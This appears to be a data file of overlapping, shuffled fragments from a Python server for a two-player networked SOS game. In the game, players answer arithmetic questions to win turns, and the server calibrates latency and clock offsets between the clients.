"- id else: self.game.turn = id self.notify_players() # Returns the normalized timestamp difference",
"conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1",
"message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for",
"self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False",
"= [0, 0] self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts = [None,",
"str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts = [None, None] print(\"Generated",
"def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready =",
"self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question",
"0 # Average difference between timestamps of player 0 and 1. self.received_acks_cnt =",
"self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready",
"the normalized timestamp difference between acknowledgment of two players in seconds. def get_timestamp_diff(self):",
"False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 -",
"sequence = \"\" sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x - (i",
"sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id]",
"else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1]",
"uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True",
"ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0",
"c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in",
"== uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE:",
"threading import pickle import json import sys import random import uuid import time",
"def send_id(self, id): conn = self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id",
"update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 ping1",
"client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received",
"import random import uuid import time sys.path.append('..') from game import Game, GameState from",
"conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"]",
"ping: \", ping1 * 1000, \" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times",
"enter_name(self, id, name): ready = False def calibrate_timestamps(self): def connection_thread(self, conn, id, i):",
"ping1 * 1000, \" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0,",
"\"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) +",
"json import sys import random import uuid import time sys.path.append('..') from game import",
"= [[], []] self.calibrations = [[{} for _ in range(10)], [{} for _",
"calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1, -1], [0, -1],",
"self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state != GameState.QUESTION: return",
"args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if",
"operator == \"*\" else 100 number_1 = random.randint(1, limit) number_2 = random.randint(1, limit)",
"conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1, -1],",
"sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x - (i - 1) *",
"self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference()",
"range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players() def",
"coordinate_y, character): directions = [[-1, 0], [-1, -1], [0, -1], [1, -1]] with",
"return id def remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id] = None",
"def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list)",
"+ str(number_2) answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question = question",
"= 0 self.ts_info = [{}, {}] self.answer_ts = [None, None] def add_connection(self, conn):",
"- id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and",
"\", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] =",
"if self.game.state != GameState.MOVE or self.game.turn != id: # or not self.both_players_received: return",
"self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn",
"self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \" + uuid) self.both_players_received",
"= [None, None] self.both_players_received = False self.calibration_acks = [[], []] self.calibrations = [[{}",
"print(\"Both player has received the question \" + uuid) self.both_players_received = True return",
"[] for i in range(3): sequence_coordinates.append([x - (i - 1) * direction[0], y",
"self.both_players_received = True return else: return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid",
"operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit = 20 if operator",
"def __init__(self): self.active_connections = [None, None] self.game = Game(4, 4) self.lock = threading.Lock()",
"= threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks = [[], []]",
"# Average difference between timestamps of player 0 and 1. self.received_acks_cnt = [0,",
"with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready = False def",
"random.choice(operator_list) limit = 20 if operator == \"*\" else 100 number_1 = random.randint(1,",
"sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row or",
"to the all players\") def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid]",
"4) self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks =",
"str(number_2) answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer",
"sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence",
"{id} duration: {duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid !=",
"= random.randint(1, limit) question = str(number_1) + operator + str(number_2) answer = str(eval(question))",
"= False def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\",",
"- id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock:",
"None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game",
"string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds",
"sys.path.append('..') from game import Game, GameState from utils import string_to_byte, byte_to_string class GameController():",
"self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player",
"and 1. self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info = [{}, {}]",
"for direction in directions: sequence = \"\" sequence_coordinates = [] for i in",
"number_1 = random.randint(1, limit) number_2 = random.randint(1, limit) question = str(number_1) + operator",
"time difference in seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id):",
"= [] for i in range(3): sequence_coordinates.append([x - (i - 1) * direction[0],",
"from game import Game, GameState from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD",
"self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"]",
"self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts = [None, None] def add_connection(self,",
"6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference",
"* self.game.col + coordinate[1]) def move(self, id, move): with self.lock: if self.game.state !=",
"self.answer_ts = [None, None] print(\"Generated the Question: \" + question + \" /",
"[[], []] self.calibrations = [[{} for _ in range(10)], [{} for _ in",
"self.ts_difference = 0 # Average difference between timestamps of player 0 and 1.",
"conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if conn: conn.close() def",
"player has received the question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question()",
"uuid import time sys.path.append('..') from game import Game, GameState from utils import string_to_byte,",
"if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] =",
"self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 -",
"self.generate_question() self.notify_players() def enter_name(self, id, name): ready = False def calibrate_timestamps(self): def connection_thread(self,",
"None: id = 0 self.active_connections[id] = conn return id def remove_player(self, id): with",
"= name self.send_id(id) if self.game.players_names[1 - id] != None: ready = True if",
"in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0,",
"def notify_players(self): print(\"Sending Game information to the all players\") def connection_thread(self, conn, id):",
"conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn,",
"in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col",
"+ \" / UUID: \" + self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id]",
"= 0 self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self): with",
"/ 6 print(\"Player 0 has a ping: \", ping0 * 1000, \" ms\")",
"move): with self.lock: if self.game.state != GameState.MOVE or self.game.turn != id: # or",
"conn = self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID",
"[None, None] self.both_players_received = False self.answer_ts = [None, None] print(\"Generated the Question: \"",
"False def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\":",
"game import Game, GameState from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD =",
"has a ping: \", ping0 * 1000, \" ms\") print(\"Player 1 has a",
"c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping: \", ping0 *",
"{} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if",
"== \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate",
"name self.send_id(id) if self.game.players_names[1 - id] != None: ready = True if ready:",
"in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players()",
"self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{} for _ in range(10)], [{}",
"uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both",
"print(\"Generated the Question: \" + question + \" / UUID: \" + self.game.question_uuid)",
"i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id]",
"character for x in range(coordinate_x - 1, coordinate_x + 2): for y in",
"self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready = False def calibrate_timestamps(self): def",
"self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id}",
"self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has",
"1 has a ping: \", ping1 * 1000, \" ms\") self.ping_difference = ping0",
"/ 2 for c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2",
"+ 2): for direction in directions: sequence = \"\" sequence_coordinates = [] for",
"* direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0]",
"self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and",
"add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] =",
"self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{} for _",
"players\") def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"]",
"for c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c",
"in range(3): sequence_coordinates.append([x - (i - 1) * direction[0], y - (i -",
"2): for y in range(coordinate_y - 1, coordinate_y + 2): for direction in",
"i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD)",
"self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]])",
"is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"]",
"self.active_connections[id] = conn return id def remove_player(self, id): with self.lock: self.active_connections[id] = None",
"_ in range(10)]] self.ts_difference = 0 # Average difference between timestamps of player",
"None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{} for",
"= str(number_1) + operator + str(number_2) answer = str(eval(question)) with self.lock: self.game.state =",
"1 - id else: self.game.turn = id self.notify_players() # Returns the normalized timestamp",
"time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] <",
"_ in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt =",
"sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id, move): with self.lock: if",
"!= GameState.MOVE or self.game.turn != id: # or not self.both_players_received: return coordinate_x, coordinate_y,",
"return else: return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return",
"- (i - 1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] <",
"self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start()",
"} print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for",
"return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]:",
"= 1 if self.active_connections[0] == None: id = 0 self.active_connections[id] = conn return",
"id = 0 self.active_connections[id] = conn return id def remove_player(self, id): with self.lock:",
"print(\"Calculated time difference in seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts,",
"limit) question = str(number_1) + operator + str(number_2) answer = str(eval(question)) with self.lock:",
"self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1,",
"directions = [[-1, 0], [-1, -1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y]",
"conn in self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions",
"[0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x",
"if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received the question",
"self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id]",
"of player 0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info",
"with self.lock: if self.game.state != GameState.MOVE or self.game.turn != id: # or not",
"= [None, None] print(\"Generated the Question: \" + question + \" / UUID:",
"True print(\"Both player has received the question \" + uuid) self.add_new_calibration_ts(uuid) return else:",
"* direction[0], y - (i - 1) * direction[1]]) if sequence_coordinates[-1][0] < 0",
"None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{} for _ in range(10)],",
"\"*\" else 100 number_1 = random.randint(1, limit) number_2 = random.randint(1, limit) question =",
"duration: {duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid:",
"= delta0 - delta1 print(\"Calculated time difference in seconds is: \", self.ts_difference) def",
"seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time()",
"sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) /",
"between acknowledgment of two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1]",
"\"-\", \"*\"] operator = random.choice(operator_list) limit = 20 if operator == \"*\" else",
"+ self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx),",
"10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start = True if ready_to_start:",
"self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid ==",
"duration if self.answer_ts[1 - id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2 *",
"enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\")",
"self.notify_players() # Returns the normalized timestamp difference between acknowledgment of two players in",
"id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \" +",
"= sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has",
"timestamps of player 0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference = 0",
"== 10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start = True if",
"+ operator + str(number_2) answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question",
"for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start()",
"self.both_players_received = True print(\"Both player has received the question \" + uuid) self.add_new_calibration_ts(uuid)",
"self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board()",
"in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 # Average difference",
"range(coordinate_x - 1, coordinate_x + 2): for y in range(coordinate_y - 1, coordinate_y",
"+ self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message = { \"TYPE\": \"ID\",",
"in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def",
"def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"]",
"self.answer_ts[1 - id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with",
"= time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock:",
"name): ready = False def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message =",
"args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\",",
"self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations =",
"for i in range(10): for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self,",
"close_connections(self): for conn in self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y,",
"\"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in",
"question \" + uuid) self.both_players_received = True return else: return else: return time.sleep(0.2)",
"* 1000, \" ms\") print(\"Player 1 has a ping: \", ping1 * 1000,",
"self.SPECIAL_KEYWORD) for i in range(10): for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread,",
"def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def",
"[]] self.calibrations = [[{} for _ in range(10)], [{} for _ in range(10)]]",
"self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10:",
"Returns the normalized timestamp difference between acknowledgment of two players in seconds. def",
"self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x - 1, coordinate_x + 2):",
"\"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for",
"client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1 if",
"def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"]",
"ready = False def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\":",
"or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence",
"the question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self,",
"for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping: \", ping0",
"Question...\") operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit = 20 if",
"uuid) self.both_players_received = True return else: return else: return time.sleep(0.2) with self.lock: if",
"if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if",
"threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to the all players\") def",
"!= None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending",
"self.active_connections = [None, None] self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts =",
"self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts = [None, None] print(\"Generated the",
"utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 #",
"None] self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received",
"\" + question + \" / UUID: \" + self.game.question_uuid) def send_id(self, id):",
"GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 - id]:",
"byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def",
"\"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not in",
"!= id: # or not self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id,",
"\" + self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message = { \"TYPE\":",
"or self.game.turn != id: # or not self.both_players_received: return coordinate_x, coordinate_y, character =",
"two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference -",
"or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col:",
"pickle import json import sys import random import uuid import time sys.path.append('..') from",
"0 self.active_connections[id] = conn return id def remove_player(self, id): with self.lock: self.active_connections[id] =",
"self.game.turn = 1 - id else: self.game.turn = id self.notify_players() # Returns the",
"!= GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 -",
"received the question \" + uuid) self.both_players_received = True return else: return else:",
"1, coordinate_x + 2): for y in range(coordinate_y - 1, coordinate_y + 2):",
"def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] =",
"threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\",",
"= \"\" sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x - (i -",
"= time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for idx, conn in",
"import Game, GameState from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\"",
"and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates:",
"[[-1, 0], [-1, -1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character",
"self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1",
"question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid):",
"= client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] ==",
"self.notify_players() def enter_name(self, id, name): ready = False def calibrate_timestamps(self): def connection_thread(self, conn,",
"= conn return id def remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id]",
"limit) number_2 = random.randint(1, limit) question = str(number_1) + operator + str(number_2) answer",
"self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self,",
"- self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"]",
"sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a",
"self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts =",
"time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id] != None:",
"1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self,",
"self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] =",
"self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state",
